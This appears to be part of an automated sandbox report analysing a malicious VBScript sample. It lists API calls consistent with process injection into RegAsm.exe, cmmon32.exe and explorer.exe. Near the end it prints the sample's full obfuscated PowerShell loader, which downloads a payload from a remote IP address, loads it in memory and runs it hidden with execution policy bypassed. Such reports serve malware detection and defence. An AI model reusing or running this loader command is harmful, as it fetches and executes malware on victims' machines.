Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04831FF1 23_2_04831FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048320A8 23_2_048320A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048328EC 23_2_048328EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821002 23_2_04821002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483E824 23_2_0483E824
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B090 23_2_0477B090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476F900 23_2_0476F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048322AE 23_2_048322AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0481FA2B 23_2_0481FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AB40 23_2_0478AB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482DBD2 23_2_0482DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048203DA 23_2_048203DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04832B28 23_2_04832B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479EBB0 23_2_0479EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_032090A0 23_2_032090A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0320909B 23_2_0320909B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0321CFAA 23_2_0321CFAA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03202FB0 23_2_03202FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03202D88 23_2_03202D88
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03202D90 23_2_03202D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00401030 24_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040909B 24_2_0040909B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004090A0 24_2_004090A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00401209 24_2_00401209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00402D88 24_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00402D90 24_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041D7DD 24_2_0041D7DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041CFAA 24_2_0041CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00402FB0 24_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03192B28 24_2_03192B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030FEBB0 24_2_030FEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0318DBD2 24_2_0318DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031922AE 24_2_031922AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030CF900 24_2_030CF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030E4120 24_2_030E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03181002 24_2_03181002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0319E824 24_2_0319E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030DB090 24_2_030DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030F20A0 24_2_030F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031920A8 24_2_031920A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031928EC 24_2_031928EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03191FF1 24_2_03191FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0318D616 24_2_0318D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030E6E30 24_2_030E6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03192EF7 24_2_03192EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03192D07 24_2_03192D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030C0D20 24_2_030C0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03191D55 24_2_03191D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030F2581 24_2_030F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031925DD 24_2_031925DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030DD5E0 24_2_030DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_030D841F 24_2_030D841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0318D466 24_2_0318D466
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FC902 37_2_0D3FC902
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FF302 37_2_0D3FF302
Source: C:\Windows\explorer.exe Code function: 37_2_0D403D02 37_2_0D403D02
Source: C:\Windows\explorer.exe Code function: 37_2_0D402F06 37_2_0D402F06
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FD362 37_2_0D3FD362
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FD359 37_2_0D3FD359
Source: C:\Windows\explorer.exe Code function: 37_2_0D4017B2 37_2_0D4017B2
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FF2FF 37_2_0D3FF2FF
Source: C:\Windows\explorer.exe Code function: 37_2_0D3FC8FB 37_2_0D3FC8FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02B6B150 appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0041A960 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 030CB150 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0041AA90 appears 38 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 0476B150 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418AA0 NtCreateFile, 9_2_00418AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418B50 NtReadFile, 9_2_00418B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418BD0 NtClose, 9_2_00418BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418C80 NtAllocateVirtualMemory, 9_2_00418C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418A9A NtCreateFile, 9_2_00418A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418BCA NtReadFile, 9_2_00418BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A20 NtResumeThread,LdrInitializeThunk, 9_2_02BA9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A00 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_02BA9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A50 NtCreateFile,LdrInitializeThunk, 9_2_02BA9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA98F0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_02BA98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_02BA9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9840 NtDelayExecution,LdrInitializeThunk, 9_2_02BA9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA99A0 NtCreateSection,LdrInitializeThunk, 9_2_02BA99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_02BA9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_02BA96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_02BA9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA97A0 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_02BA97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9780 NtMapViewOfSection,LdrInitializeThunk, 9_2_02BA9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9FE0 NtCreateMutant,LdrInitializeThunk, 9_2_02BA9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9710 NtQueryInformationToken,LdrInitializeThunk, 9_2_02BA9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA95D0 NtClose,LdrInitializeThunk, 9_2_02BA95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9540 NtReadFile,LdrInitializeThunk, 9_2_02BA9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A80 NtOpenDirectoryObject, 9_2_02BA9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A10 NtQuerySection, 9_2_02BA9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAA3B0 NtGetContextThread, 9_2_02BAA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9B00 NtSetValueKey, 9_2_02BA9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA98A0 NtWriteVirtualMemory, 9_2_02BA98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9820 NtEnumerateKey, 9_2_02BA9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAB040 NtSuspendThread, 9_2_02BAB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA99D0 NtCreateProcessEx, 9_2_02BA99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9950 NtQueueApcThread, 9_2_02BA9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA96D0 NtCreateKey, 9_2_02BA96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9610 NtEnumerateValueKey, 9_2_02BA9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9670 NtQueryInformationProcess, 9_2_02BA9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9650 NtQueryValueKey, 9_2_02BA9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9730 NtQueryVirtualMemory, 9_2_02BA9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAA710 NtOpenProcessToken, 9_2_02BAA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9770 NtSetInformationFile, 9_2_02BA9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAA770 NtOpenThread, 9_2_02BAA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9760 NtOpenProcess, 9_2_02BA9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA95F0 NtQueryInformationFile, 9_2_02BA95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BAAD30 NtSetContextThread, 9_2_02BAAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9520 NtWaitForSingleObject, 9_2_02BA9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9560 NtWriteFile, 9_2_02BA9560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9540 NtReadFile,LdrInitializeThunk, 23_2_047A9540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A95D0 NtClose,LdrInitializeThunk, 23_2_047A95D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 23_2_047A9660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9650 NtQueryValueKey,LdrInitializeThunk, 23_2_047A9650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_047A96E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A96D0 NtCreateKey,LdrInitializeThunk, 23_2_047A96D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9710 NtQueryInformationToken,LdrInitializeThunk, 23_2_047A9710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9FE0 NtCreateMutant,LdrInitializeThunk, 23_2_047A9FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9780 NtMapViewOfSection,LdrInitializeThunk, 23_2_047A9780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9860 NtQuerySystemInformation,LdrInitializeThunk, 23_2_047A9860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9840 NtDelayExecution,LdrInitializeThunk, 23_2_047A9840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_047A9910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A99A0 NtCreateSection,LdrInitializeThunk, 23_2_047A99A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A50 NtCreateFile,LdrInitializeThunk, 23_2_047A9A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9560 NtWriteFile, 23_2_047A9560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AAD30 NtSetContextThread, 23_2_047AAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9520 NtWaitForSingleObject, 23_2_047A9520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A95F0 NtQueryInformationFile, 23_2_047A95F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9670 NtQueryInformationProcess, 23_2_047A9670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9610 NtEnumerateValueKey, 23_2_047A9610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AA770 NtOpenThread, 23_2_047AA770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9770 NtSetInformationFile, 23_2_047A9770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9760 NtOpenProcess, 23_2_047A9760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9730 NtQueryVirtualMemory, 23_2_047A9730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AA710 NtOpenProcessToken, 23_2_047AA710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A97A0 NtUnmapViewOfSection, 23_2_047A97A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AB040 NtSuspendThread, 23_2_047AB040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9820 NtEnumerateKey, 23_2_047A9820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A98F0 NtReadVirtualMemory, 23_2_047A98F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A98A0 NtWriteVirtualMemory, 23_2_047A98A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9950 NtQueueApcThread, 23_2_047A9950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A99D0 NtCreateProcessEx, 23_2_047A99D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A20 NtResumeThread, 23_2_047A9A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A10 NtQuerySection, 23_2_047A9A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A00 NtProtectVirtualMemory, 23_2_047A9A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9A80 NtOpenDirectoryObject, 23_2_047A9A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A9B00 NtSetValueKey, 23_2_047A9B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047AA3B0 NtGetContextThread, 23_2_047AA3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218B50 NtReadFile, 23_2_03218B50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218BD0 NtClose, 23_2_03218BD0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218AA0 NtCreateFile, 23_2_03218AA0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218C80 NtAllocateVirtualMemory, 23_2_03218C80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218BCA NtReadFile, 23_2_03218BCA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_03218A9A NtCreateFile, 23_2_03218A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418AA0 NtCreateFile, 24_2_00418AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418B50 NtReadFile, 24_2_00418B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418BD0 NtClose, 24_2_00418BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418C80 NtAllocateVirtualMemory, 24_2_00418C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418A9A NtCreateFile, 24_2_00418A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418BCA NtReadFile, 24_2_00418BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_03109910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_03109860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109FE0 NtCreateMutant,LdrInitializeThunk, 24_2_03109FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_03109660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031096E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_031096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031095D0 NtClose,LdrInitializeThunk, 24_2_031095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109B00 NtSetValueKey, 24_2_03109B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310A3B0 NtGetContextThread, 24_2_0310A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A10 NtQuerySection, 24_2_03109A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A00 NtProtectVirtualMemory, 24_2_03109A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A20 NtResumeThread, 24_2_03109A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A50 NtCreateFile, 24_2_03109A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109A80 NtOpenDirectoryObject, 24_2_03109A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109950 NtQueueApcThread, 24_2_03109950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031099A0 NtCreateSection, 24_2_031099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031099D0 NtCreateProcessEx, 24_2_031099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109820 NtEnumerateKey, 24_2_03109820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109840 NtDelayExecution, 24_2_03109840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310B040 NtSuspendThread, 24_2_0310B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031098A0 NtWriteVirtualMemory, 24_2_031098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031098F0 NtReadVirtualMemory, 24_2_031098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109710 NtQueryInformationToken, 24_2_03109710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310A710 NtOpenProcessToken, 24_2_0310A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109730 NtQueryVirtualMemory, 24_2_03109730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109770 NtSetInformationFile, 24_2_03109770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310A770 NtOpenThread, 24_2_0310A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109760 NtOpenProcess, 24_2_03109760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109780 NtMapViewOfSection, 24_2_03109780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031097A0 NtUnmapViewOfSection, 24_2_031097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109610 NtEnumerateValueKey, 24_2_03109610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109650 NtQueryValueKey, 24_2_03109650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109670 NtQueryInformationProcess, 24_2_03109670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031096D0 NtCreateKey, 24_2_031096D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0310AD30 NtSetContextThread, 24_2_0310AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109520 NtWaitForSingleObject, 24_2_03109520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109540 NtReadFile, 24_2_03109540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_03109560 NtWriteFile, 24_2_03109560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_031095F0 NtQueryInformationFile, 24_2_031095F0
Source: daveCrpted.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: daveCrpted.vbs ReversingLabs: Detection: 12%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
